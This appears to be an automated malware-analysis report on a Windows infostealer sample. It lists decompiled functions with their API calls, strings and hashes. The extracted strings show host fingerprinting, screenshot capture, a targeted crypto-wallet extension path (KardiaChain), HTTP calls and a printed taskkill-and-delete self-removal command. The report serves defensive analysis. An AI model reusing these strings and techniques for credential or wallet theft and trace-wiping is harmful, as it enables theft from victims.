SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?), ref: 0049864D
ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 00498664
SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0049866D
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0049867E
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0049869F
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 004986B0

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-0
Opcode ID: bfbb248982ee7a52a62e57597ec3854ac9af00e181a86566ae72ff5cad27a90f
Instruction ID: 227adef929ca9e4cc889ebfd138ef45e677136110288c94b542a9d3f050b2155
Opcode Fuzzy Hash: bfbb248982ee7a52a62e57597ec3854ac9af00e181a86566ae72ff5cad27a90f
Instruction Fuzzy Hash: 19616E71604300AFE714DF59CC81B6BBBE4FB89704F14892EF65597280DB78E9048B9A

Uniqueness

Uniqueness Score: -1.00%

Function 004918F0, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 122libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00491960
GetProcAddress.KERNEL32(00000000), ref: 00491967
_memset.LIBCMT ref: 0049197B
GlobalMemoryStatusEx.KERNEL32 ref: 00491990

Part of subcall function 00496100: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0049629C

GlobalMemoryStatus.KERNEL32 ref: 00491A0C

Strings

GlobalMemoryStatusEx, xrefs: 00491947
kernel32.dll, xrefs: 0049194C
, xrefs: 00491A04
MB, xrefs: 004919B5, 00491A28

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: GlobalMemoryStatus$AddressHandleIos_base_dtorModuleProc_memsetstd::ios_base::_
String ID: $ MB$GlobalMemoryStatusEx$kernel32.dll
API String ID: 1880670307-2360964551
Opcode ID: f0677af00084243c6d0ec27921ceae4ce153ebe7ab0b127a877720fdedfe43fd
Instruction ID: 3bb85a2df4540dd178470525d205b64bac93281e9d201e02d99d2e0099ba6c38
Opcode Fuzzy Hash: f0677af00084243c6d0ec27921ceae4ce153ebe7ab0b127a877720fdedfe43fd
Instruction Fuzzy Hash: A3418FB15083409FD760DF69C841B4BBBE8BBD8708F40492EF19993251EB789508CFAB

Uniqueness

Uniqueness Score: -1.00%

Function 00414FD0, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 263networkfileCOMMON

Download Yara Rule

APIs

InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00415041
InternetReadFile.WININET(?,?,000003E8,?), ref: 00415062
_memmove.LIBCMT ref: 0041509D
_memset.LIBCMT ref: 004150D7
HttpQueryInfoA.WININET(?,0000001D,?,?,00000000), ref: 004150ED

Strings

text, xrefs: 00415196

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileInternet$HttpInfoPointerQueryRead_memmove_memset
String ID: text
API String ID: 612126011-999008199
Opcode ID: 1984573de4effc635d69209429164b85d18a9a6909d37304ae21d0ee84ca475b
Instruction ID: 010eb944c99dd7c4094758586f6ceeef2a8d535b3fc3a7f0f8942080d6cfdaab
Opcode Fuzzy Hash: 1984573de4effc635d69209429164b85d18a9a6909d37304ae21d0ee84ca475b
Instruction Fuzzy Hash: C2A16A715047409FD324DF69C984AABBBE8FFC9704F404A2EF48A87650E738E944CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00495C70, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 147COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(77EF155D,0000000F,00000000,00000000), ref: 00495CB3

Part of subcall function 004950D0: OpenProcess.KERNEL32 ref: 00495104
Part of subcall function 004950D0: GetModuleFileNameExA.PSAPI(00000000,00000000,00000000,00000104), ref: 0049511D
Part of subcall function 004950D0: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 00495123

GetCurrentProcessId.KERNEL32(?,00000000), ref: 00495CD0

Part of subcall function 00495B50: _memset.LIBCMT ref: 00495BC6
Part of subcall function 00495B50: OpenProcess.KERNEL32(00000410,00000000,?,7519F510,?,00000000,00000000,004B76C0,000000FF), ref: 00495BD5
Part of subcall function 00495B50: EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00495BEC
Part of subcall function 00495B50: GetModuleBaseNameA.PSAPI(00000000,?,00000000,00000104,00000000,?,00000004,?), ref: 00495C03
Part of subcall function 00495B50: CloseHandle.KERNEL32(00000000), ref: 00495C09

ShellExecuteA.SHELL32(00000000,00000000,C:\Windows\System32\cmd.exe,?,00000000,00000000), ref: 00495E4A

Strings

& exit, xrefs: 00495D3E
C:\Windows\System32\cmd.exe, xrefs: 00495E43
/f & timeout /t 6 & del /f /q ", xrefs: 00495CF7
/c taskkill /im , xrefs: 00495CE4
" & del C:\ProgramData\*.dll, xrefs: 00495D26

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$CloseCurrentHandleModuleNameOpen$BaseEnumExecuteFileModulesShell_memset
String ID: & exit$ /f & timeout /t 6 & del /f /q "$" & del C:\ProgramData\*.dll$/c taskkill /im $C:\Windows\System32\cmd.exe
API String ID: 1900182271-455057220
Opcode ID: 325f77602431cf2ddcd7e2c0eb3cd6cb5bd32c029cc92001d957d666858a7bcd
Instruction ID: 80fb70d65dd2718c4243bffa5d69c3b98486de3ce39fce78e17722933c0bd343
Opcode Fuzzy Hash: 325f77602431cf2ddcd7e2c0eb3cd6cb5bd32c029cc92001d957d666858a7bcd
Instruction Fuzzy Hash: 27519EB1508780DFDB21DB65C881B9FFBE9AB95710F504A2FF18983241DB389504CBAB

Uniqueness

Uniqueness Score: -1.00%

Function 00415049, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 227networkfileCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,000003E8,?), ref: 00415062
_memmove.LIBCMT ref: 0041509D
_memset.LIBCMT ref: 004150D7
HttpQueryInfoA.WININET(?,0000001D,?,?,00000000), ref: 004150ED
_memcpy_s.LIBCMT ref: 00415278
_memcpy_s.LIBCMT ref: 0041529E

Strings

text, xrefs: 00415196

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memcpy_s$FileHttpInfoInternetQueryRead_memmove_memset
String ID: text
API String ID: 2621122860-999008199
Opcode ID: 85e3642f12464866a4f0b7e4e2a231b34a6ca2d16eb8e91cbd1e8f0a050bd3f5
Instruction ID: 091cd4be6dad48abed75e81d522ed1e64d98246c836f371e83b4be71397394fe
Opcode Fuzzy Hash: 85e3642f12464866a4f0b7e4e2a231b34a6ca2d16eb8e91cbd1e8f0a050bd3f5
Instruction Fuzzy Hash: 94817C716047009FD714DF69C980AABB7E8FFC8704F404A2EF48A87651EB38E944CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00491120, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 65registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0049115D
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,00000000), ref: 0049117B
RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,?), ref: 0049119D
RegCloseKey.ADVAPI32(?), ref: 004911A8
CharToOemA.USER32(?,?), ref: 004911BB

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 00491171
MachineGuid, xrefs: 00491197

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2235053359-1211650757
Opcode ID: 0d140eaf0a69e7697621d4ede093fec4d8c5d02b3b65d31d4745cf367963877d
Instruction ID: 19c2117ca53fd4f36b8f6bf9f1fbbeae893722a24cb0c5e242639b8217a5a643
Opcode Fuzzy Hash: 0d140eaf0a69e7697621d4ede093fec4d8c5d02b3b65d31d4745cf367963877d
Instruction Fuzzy Hash: 2921D775208346ABD720DF10DC49FABBBE8EFD8704F10892EF58987191D7B49108CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00490D90, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 65registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00490DCD
RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?,00000000), ref: 00490DEB
RegQueryValueExA.KERNEL32(?,ProcessorNameString,00000000,00000000,?,?), ref: 00490E0D
RegCloseKey.ADVAPI32(?), ref: 00490E18
CharToOemA.USER32(?,?), ref: 00490E2B

Strings

HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 00490DE1
ProcessorNameString, xrefs: 00490E07

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset
String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString
API String ID: 2235053359-2804670039
Opcode ID: c237c8f1da37a41a9e90317740f145dbb6177b42e47a7d49ed1475d495ffa043
Instruction ID: dac7252edb339d53bca35717811a975d0f8edd1b84d8fed9b14a6a6daca79a94
Opcode Fuzzy Hash: c237c8f1da37a41a9e90317740f145dbb6177b42e47a7d49ed1475d495ffa043
Instruction Fuzzy Hash: 15219275208346AFD720DF10DC49FABBBE8EBD5704F108D2EF58987191E7B4A5088B96

Uniqueness

Uniqueness Score: -1.00%

Function 00490F30, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 65registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00490F6D
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,00000000), ref: 00490F8B
RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,?,?), ref: 00490FAD
RegCloseKey.ADVAPI32(?), ref: 00490FB8
CharToOemA.USER32(?,?), ref: 00490FCB

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00490F81
ProductName, xrefs: 00490FA7

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset
String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 2235053359-1787575317
Opcode ID: 2dc4d3b5163da3d879576930cb0971a4e3795d9dbc9fd179c575c914ee7f2a20
Instruction ID: be9c2be7ac265e0429e7c48a7795dc7e79d438741db4c637319d9a70996166a6
Opcode Fuzzy Hash: 2dc4d3b5163da3d879576930cb0971a4e3795d9dbc9fd179c575c914ee7f2a20
Instruction Fuzzy Hash: E621C575208346AFD720DF10DC49FABBBE8EBD4704F10892EF58987191D7B4A1088B96

Uniqueness

Uniqueness Score: -1.00%

Function 00495950, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064,ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789,00000024,77EF155D), ref: 004959C9
__time64.LIBCMT ref: 004959D0

Part of subcall function 0049D44C: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004959D5,00000000), ref: 0049D457
Part of subcall function 0049D44C: __aulldiv.LIBCMT ref: 0049D477

Part of subcall function 00493050: _malloc.LIBCMT ref: 00493057
Part of subcall function 00493050: GetTickCount.KERNEL32 ref: 00493064
Part of subcall function 00493050: _rand.LIBCMT ref: 00493080
Part of subcall function 00493050: _sprintf.LIBCMT ref: 00493095

Part of subcall function 0049FE88: __getptd.LIBCMT ref: 0049FE8D

_rand.LIBCMT ref: 00495A05

Part of subcall function 0049FE9A: __getptd.LIBCMT ref: 0049FE9A

std::_Xinvalid_argument.LIBCPMT ref: 00495A1C

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 0049598A
invalid string position, xrefs: 00495A17

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Time__getptd_rand$CountFileSleepSystemTickXinvalid_argument__aulldiv__time64_malloc_sprintfstd::_
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$invalid string position
API String ID: 3490354527-3173898365
Opcode ID: 357e6f8e4c1c543a149263cccda9c748d442fccebcd230183d73eb6c61cf46b5
Instruction ID: 6801e1378f72f6fa28ec371c07371dd7753675c767b4f3e7db2a2a0bdb9decb4
Opcode Fuzzy Hash: 357e6f8e4c1c543a149263cccda9c748d442fccebcd230183d73eb6c61cf46b5
Instruction Fuzzy Hash: 864192B1A00644ABDF15DFA5D881BAEBBF5FF84704F20013EF502A7281DBB85905CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00404570, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00404587

Part of subcall function 0049B1D5: std::exception::exception.LIBCMT ref: 0049B1EA
Part of subcall function 0049B1D5: __CxxThrowException@8.LIBCMT ref: 0049B1FF
Part of subcall function 0049B1D5: std::exception::exception.LIBCMT ref: 0049B210

std::_Xinvalid_argument.LIBCPMT ref: 004045AA
std::_Xinvalid_argument.LIBCPMT ref: 004045C5
_memmove.LIBCMT ref: 00404626

Strings

string too long, xrefs: 004045A5, 004045C0
invalid string position, xrefs: 00404582

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 443534600-4289949731
Opcode ID: 8905edb11f5454c969ec5fb06ca52cdefd0d13374e24c855a411bd32cf068c8a
Instruction ID: 250e57ee2fc2892ce8122578cd2753f4dee41fd89a5c0ce31f9679457375e17d
Opcode Fuzzy Hash: 8905edb11f5454c969ec5fb06ca52cdefd0d13374e24c855a411bd32cf068c8a
Instruction Fuzzy Hash: 2F2193723042009BC724DE1DE990A2AB7E1EBE6714B600E3FF252D72D1D779DC4187A9

Uniqueness

Uniqueness Score: -1.00%

Function 00495B50, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00495BC6
OpenProcess.KERNEL32(00000410,00000000,?,7519F510,?,00000000,00000000,004B76C0,000000FF), ref: 00495BD5
EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00495BEC
GetModuleBaseNameA.PSAPI(00000000,?,00000000,00000104,00000000,?,00000004,?), ref: 00495C03
CloseHandle.KERNEL32(00000000), ref: 00495C09

Strings

<unknown>, xrefs: 00495B9D

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$BaseCloseEnumHandleModuleModulesNameOpen_memset
String ID: <unknown>
API String ID: 601403599-1574992787
Opcode ID: e46e3a2179ccf2919aaaf58cfad6f48ef90f43791817674302e6eb898ca9c5cb
Instruction ID: 9536f0ebb8a1b929c29d2b72b5e560e1c46f4cb7cedc00f495ac57ce8f04f565
Opcode Fuzzy Hash: e46e3a2179ccf2919aaaf58cfad6f48ef90f43791817674302e6eb898ca9c5cb
Instruction Fuzzy Hash: 6D316171504248AFDB10DF65DD85AEF7BB8FB58700F00453EFA499B240DB745A48CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004160D0, Relevance: 10.6, APIs: 7, Instructions: 74filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004160E8
GetFileSizeEx.KERNEL32(00000000,?), ref: 00416103
LocalAlloc.KERNEL32(00000040,?), ref: 00416122
ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0041613E
CloseHandle.KERNEL32(00000000,00000000), ref: 00416158
LocalFree.KERNEL32(00000000,?,00000000,00000000), ref: 0041616C
CloseHandle.KERNEL32(00000000), ref: 00416175

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseHandleLocal$AllocCreateFreeReadSize
String ID:
API String ID: 2550598358-0
Opcode ID: ea1ed4f663f210bf279e9be9a4c724b4941ff26b702b3d7a999a323d08abd69b
Instruction ID: 8f4aa0cb0259d60c456a7e28e24e9842decc99eb3486f1dac33458421606f435
Opcode Fuzzy Hash: ea1ed4f663f210bf279e9be9a4c724b4941ff26b702b3d7a999a323d08abd69b
Instruction Fuzzy Hash: 5711AF71200204BFD7109F68EC84AABB7BCFB857A4F01462EF94492250DB74DD48CA66

Uniqueness

Uniqueness Score: -1.00%

Function 00493210, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 51memoryfilewindowCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010,00000000,00000000), ref: 00493226
GdipCreateBitmapFromHBITMAP.GDIPLUS(?), ref: 00493247
GdipSaveImageToFile.GDIPLUS(?,screenshot.jpg,?,00000000,00000000,00000000), ref: 0049327C

Strings

4I, xrefs: 00493239
image/jpeg, xrefs: 0049325F
screenshot.jpg, xrefs: 00493276

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Gdip$AllocBitmapCreateFileFromImageSave
String ID: 4I$image/jpeg$screenshot.jpg
API String ID: 2335731563-1775685956
Opcode ID: 77a6ec751a7033276775a4eadda5c8d2b569e27150823061d7e87b14f3758873
Instruction ID: 59c94c5ec6955f5a8af1cdd0256f6d5871432531573287e647d274b9cc819e22
Opcode Fuzzy Hash: 77a6ec751a7033276775a4eadda5c8d2b569e27150823061d7e87b14f3758873
Instruction Fuzzy Hash: F701C471600301AFD710DF55D942B1BBBE4EFC9B01F50892EF48997240DB78EA0487E6

Uniqueness

Uniqueness Score: -1.00%

Function 0049C971, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0049C98B

Part of subcall function 0049E04E: __FF_MSGBANNER.LIBCMT ref: 0049E067
Part of subcall function 0049E04E: __NMSG_WRITE.LIBCMT ref: 0049E06E
Part of subcall function 0049E04E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A0B2E,00000000,00000001,00000000,?,004A75C4,00000018,004CF090,0000000C,004A7654), ref: 0049E093

std::exception::exception.LIBCMT ref: 0049C9C0
std::exception::exception.LIBCMT ref: 0049C9DA
__CxxThrowException@8.LIBCMT ref: 0049C9EB

Strings

P-@, xrefs: 0049C9A3
bad allocation, xrefs: 0049C9B9

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID: P-@$bad allocation
API String ID: 615853336-1329529977
Opcode ID: 947a0ab379d0fb12964c54183797623f7a8b992c1ffabfa6080dd38af0b9f357
Instruction ID: baa4dd520f34c1804c13deedcca7e244aa2bb1314d8136e224ff5042320ae75c
Opcode Fuzzy Hash: 947a0ab379d0fb12964c54183797623f7a8b992c1ffabfa6080dd38af0b9f357
Instruction Fuzzy Hash: 32F02DB05411095BCF10EB55DC86E9D7FA89B80318F10013FF804A62D2DBBC8A008B5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040E947, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 112fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004930F0: GetFileAttributesA.KERNEL32(?,00407054,00000000), ref: 004930F5

FindNextFileA.KERNELBASE(?,?), ref: 0040EACF
FindClose.KERNEL32(?), ref: 0040EADE

Strings

\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk, xrefs: 0040E998
KardiaChain, xrefs: 0040EA12
Wallets, xrefs: 0040EA36

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFind$AttributesCloseNext
String ID: KardiaChain$Wallets$\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk
API String ID: 730532403-811050526
Opcode ID: 7a2db4b78275a552c8e40fa6c36c770aacd40ecc0bc91a24b66d579c2406f31f
Instruction ID: e88135c4a70784839d7248850c3e8d3fc8f132e2066831d5381241641caa25fd
Opcode Fuzzy Hash: 7a2db4b78275a552c8e40fa6c36c770aacd40ecc0bc91a24b66d579c2406f31f
Instruction Fuzzy Hash: 9241A6B15183805BC236EB75D8528DFB7ACAFD9314F400A2EE585572D2EB346604CBA7

Uniqueness

Uniqueness Score: -1.00%

Function 00493320, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GdiplusStartup.GDIPLUS ref: 00493350
GetSystemMetrics.USER32(00000000), ref: 00493357
GetSystemMetrics.USER32(00000001), ref: 00493361

Part of subcall function 004932B0: SelectObject.GDI32(00000000,00000000), ref: 004932DB
Part of subcall function 004932B0: DeleteObject.GDI32(00000000), ref: 00493312

GdiplusShutdown.GDIPLUS(?), ref: 0049337F

Strings

screenshot.jpg, xrefs: 00493367

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: GdiplusMetricsObjectSystem$DeleteSelectShutdownStartup
String ID: screenshot.jpg
API String ID: 654883086-673422685
Opcode ID: 7f22bac0b2c61c0920552f2ec088bc8bfd32d7994bec497776c2dc1517278c90
Instruction ID: 8c784b11513f6988e73a0c015c231527d2dfc230300657a9e1fbeef5535ab53f
Opcode Fuzzy Hash: 7f22bac0b2c61c0920552f2ec088bc8bfd32d7994bec497776c2dc1517278c90
Instruction Fuzzy Hash: 82F089B11083006FD300EF55DD46F4B7FA4EF80B08F40455DF545561C2D7B981088BEA

Uniqueness

Uniqueness Score: -1.00%

Function 00498B40, Relevance: 7.6, APIs: 5, Instructions: 127timeCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,?,00000000,?,?,0049A7E7,?,?,00000000,00000000,00000010), ref: 00498B94
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,0049A7E7,?,?,00000000,00000000), ref: 00498BC1
GetLocalTime.KERNEL32(?,?,?,0049A7E7,?,?,00000000,00000000,00000010,00000000), ref: 00498C06
SystemTimeToFileTime.KERNEL32(?,?,?,?,0049A7E7,?,?,00000000,00000000,00000010,00000000), ref: 00498C16
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00498C53

Part of subcall function 00498570: GetFileInformationByHandle.KERNEL32(?,?,?,?), ref: 004985A6

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Time$Pointer$HandleInformationLocalSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 89576305-0
Opcode ID: 8de9f16e28c943ed37f5d46d155a9b6da7c04f9b91277517f3cfe4386719e072
Instruction ID: 17ee11142aad87d9e1524ee9e71412c506f87eb4d94cfcf7d0711618822b5b06
Opcode Fuzzy Hash: 8de9f16e28c943ed37f5d46d155a9b6da7c04f9b91277517f3cfe4386719e072
Instruction Fuzzy Hash: 524184B15047449FD724DF2DD88096BFBE8FB98314F404A2EF59A83650EB35E848CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00498840, Relevance: 7.6, APIs: 5, Instructions: 124fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,00000000,00499ACF,?,?,?), ref: 00498894
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000000,00000080,00000000,00000000,00000000,00499ACF,?,?,?), ref: 004988CE

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: 3921cb8763274d03bae0c686f506cdeec3130fb530ea04b05ea8bcb4bb943b30
Instruction ID: e9b6aeef278d83f94250be4833e93a3f72fcc0d2092cafd1c5e3e215c5bd97f2
Opcode Fuzzy Hash: 3921cb8763274d03bae0c686f506cdeec3130fb530ea04b05ea8bcb4bb943b30
Instruction Fuzzy Hash: 04415EB25047009FDB309F6C9884B6BBBD8E795325F108A3FF196C6650C674D884CB29

Uniqueness

Uniqueness Score: -1.00%

Function 00402FA0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 00403039

Part of subcall function 0049C32E: std::exception::_Copy_str.LIBCMT ref: 0049C349

__CxxThrowException@8.LIBCMT ref: 0040304E

Part of subcall function 0049C9F1: RaiseException.KERNEL32(S0@,?,77EF155D,004BB6BC,00403053,?,004CB4C0,?,77EF155D), ref: 0049CA33

Part of subcall function 00402EE0: std::exception::exception.LIBCMT ref: 00402F10
Part of subcall function 00402EE0: __CxxThrowException@8.LIBCMT ref: 00402F27

_memmove.LIBCMT ref: 00403095

Strings

P-@, xrefs: 00403047

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_memmovestd::exception::_
String ID: P-@
API String ID: 163498487-3305893085
Opcode ID: 0de69fbc35791d1413f70ee3db8172b11faee96ba46e9e5d1fead73d3e3d4c11
Instruction ID: 8abb1a78577fe6a0bbecbf7ab086c6365ff3b43973a43b2c898c643c438534f5
Opcode Fuzzy Hash: 0de69fbc35791d1413f70ee3db8172b11faee96ba46e9e5d1fead73d3e3d4c11
Instruction Fuzzy Hash: CE41B371911205ABCB14DF69C881A9EBFF8EB09364F50423FE816A73C1D7799A40CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00416475, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?), ref: 00416519

Part of subcall function 0049E19E: __fsopen.LIBCMT ref: 0049E1AB

_fprintf.LIBCMT ref: 004164D2
_fprintf.LIBCMT ref: 004164DD

Part of subcall function 0049CF02: __lock_file.LIBCMT ref: 0049CF49
Part of subcall function 0049CF02: __stbuf.LIBCMT ref: 0049CFCD
Part of subcall function 0049CF02: __output_l.LIBCMT ref: 0049CFDD
Part of subcall function 0049CF02: __ftbuf.LIBCMT ref: 0049CFE7

Strings

%s%s, xrefs: 004164CC

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$DeleteFile__fsopen__ftbuf__lock_file__output_l__stbuf
String ID: %s%s
API String ID: 2213557054-2561119221
Opcode ID: 5b808c69128959b447e12eb132bd504b8ed487555c0b71959ac1489be10229dd
Instruction ID: dff350930be7dd991d9a0eb1f9eb56c0da1284c2cdc090c8a803d1185b4c12d2
Opcode Fuzzy Hash: 5b808c69128959b447e12eb132bd504b8ed487555c0b71959ac1489be10229dd
Instruction Fuzzy Hash: 3D11E7B690430067C924F772AC83EDF73985F94B05F01883EF54997242EA3DE90583AE

Uniqueness

Uniqueness Score: -1.00%

Function 00414A10, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00414A1B
_strcpy_s.LIBCMT ref: 00414A32
_memset.LIBCMT ref: 00414A51

Strings

1BEF0A57BE110FD467A, xrefs: 00414A24

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset$_strcpy_s
String ID: 1BEF0A57BE110FD467A
API String ID: 1261871945-2910601657
Opcode ID: 88a9e5dfc9833a836808a1ab1ae1f9eb64d6c2832a00b5ef89d707f368bcbc5e
Instruction ID: 7bdc023e39880342543e07bcad02bf11e1c7d3a236515f781d168fd2557a93ae
Opcode Fuzzy Hash: 88a9e5dfc9833a836808a1ab1ae1f9eb64d6c2832a00b5ef89d707f368bcbc5e
Instruction Fuzzy Hash: CFF081706417009FD360DF55D981A4BBBE0FF88B00F40891EF58A97780D778F8008B95

Uniqueness

Uniqueness Score: -1.00%

Function 00403590, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00403604
_memmove.LIBCMT ref: 00403653

Part of subcall function 00403370: std::_Xinvalid_argument.LIBCPMT ref: 0040338A

Strings

string too long, xrefs: 004035FF

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
